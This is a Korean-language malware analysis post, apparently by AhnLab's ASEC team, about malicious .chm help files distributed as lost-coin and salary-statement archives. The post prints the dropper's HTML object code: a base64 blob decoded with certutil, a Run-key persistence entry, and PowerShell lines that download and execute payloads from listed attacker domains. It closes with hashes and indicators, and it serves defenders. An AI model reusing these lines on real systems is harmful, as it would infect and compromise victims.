코인분실, 급여명세서 위장한 악성 도움말 파일 (*.chm)

ASEC 분석팀은 윈도우 도움말 파일(*.chm) 형식의 악성코드가 지속적으로 유포되고 있음을 확인하였다. 최근 확인된 chm 파일은 <윈도우 도움말 파일(*.chm)로 유포되는 APT 공격>에서 소개한 파일과 동일한 유형으로 추가 악성코드 다운로드를 목적으로 한다.

해당 유형의 chm 파일은 주로 압축파일 형태로 유포되는 것으로 추정된다. 확인된 압축파일명과 내부 chm 파일명은 다음과 같다.

압축 파일명내부 chm 파일명
코인분실자료.ziplost.chm
자료.zip기본.chm
급여명세서.rarsalary.chm
표1. 확인된 파일명

코인분실자료.zip 파일에는 다음과 같이 추가 압축 파일과 워드 문서가 포함되어 있다.

그림1. 코인분실자료.zip 내부 파일

워드 문서의 경우 악성 기능이 없는 정상 파일로 아래 그림과 같이 코인 분실과 관련된 내용을 담고 있다.

그림2. 워드 문서

잃은 코인 찾기.rar 에는 lost.chm이 포함되어 있으며, 해당 파일 실행 시 코인 관련 내용을 담은 도움말 창을 생성하고 악성 행위를 수행한다.

그림 3. 잃은 코인 찾기.rar 내부
그림 4. lost.chm 실행 화면

lost.chm 파일 내부에는 이전 게시글과 동일하게 html 파일 내에 특정 명령어가 존재한다. 따라서 chm 파일 실행 시 cmd 명령어가 실행되어 %USERPROFILE%\Links\ 폴더에 Document.dat 파일과 Document.jse 파일이 생성된다. 기존과 달리 Document.vbs가 아닌 Document.jse가 생성되는 차이가 존재한다.

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=',cmd, /c echo I0B+XnZBQUFBQT09LW1EfmsnCStoLGIxT2s3K3ByKExuXkRgSnFqbU1rd0QganR/Vl5KYmlAI0AmN2wuUDF4SjE6W35KbVAyR1MrLi80bl5WfmJoTVBPS0VEV1B1WWh3dS13XmtEL2sgK1grUDRPT3drKUp6V1dhcn80bk5jXldzeltDRGw0Q2R/els0YzI0d19EWGErJzhQTH4vRGwuWSxdT2hhXS0nXi9NLy9jbmErcmlAI0AmZFIuOwlgXn5aUzBtVmRuKmkyRDRBQUE9PV4jfkAA > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.jse" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.jse" /f'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

Document.dat에 존재하는 데이터는 basse64로 디코딩하여 Document.jse로 저장한다. 디코딩된 jse 데이터는 다음과 같이 파워쉘을 이용하여 특정 url로부터 추가 파일을 다운로드 및 실행한다.

var s=new ActiveXObject("WScript.Shell");
var c="cmd /c powershell iwr -outf %tmp%\\csrss.exe hxxps://foxiebed[.]com/database/db.php?type=1 & start %tmp%\\csrss.exe";
s.run(c,0,false);

이후 HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run에 %USERPROFILE%\Links\Document.jse 을 추가하여 jse 파일이 지속적으로 실행될 수 있도록 한다.

추가로 확인된 chm 파일은 다음과 같다.

  • 급여명세서.rar – salary.chm
그림 5. salary.chm 실행 화면
(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\sihost.exe hxxps://cerebrovascular[.]net/resource/post & start %tmp%\\sihost.exe mLzio512pQo”,0,false)
디코딩된 Document.jse 데이터
  • 자료.zip – 기본.chm

해당 파일의 경우 앞서 설명한 코인분실자료.zip과 마찬가지로 정상 pdf 파일이 함께 압축되어있다.

그림 8. 정상 pdf 파일
그림 9. 기본.chm 실행 화면
(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\lsass.exe hxxps://trueliebe[.]com/kettle/pot & start %tmp%\\lsass.exe Dmzei125oAl”,0,false)
디코딩된 Document.jse 데이터

현재 다운로드 URL에 접속이 불가하여 추가 파일은 확인되지 않으나 공격자에 의해 다양한 악성 파일이 업로드 될 수 있어 사용자의 주의가 필요하다.

현재 V3에서는 해당 악성코드들을 다음과 같이 진단하고 있다.

[파일 진단]
Trojan/CHM.Agent

[IOC]
aac428717f4b5ea1bfac9ae0998e661c
7467a360837a85ace6e14acc879e00e5
13446d8496858c2eac78e5e985af605b
hxxps://foxiebed[.]com/database/db.php?type=1
hxxps://cerebrovascular[.]net/resource/post
hxxps://trueliebe[.]com/kettle/pot

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:

5 1 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments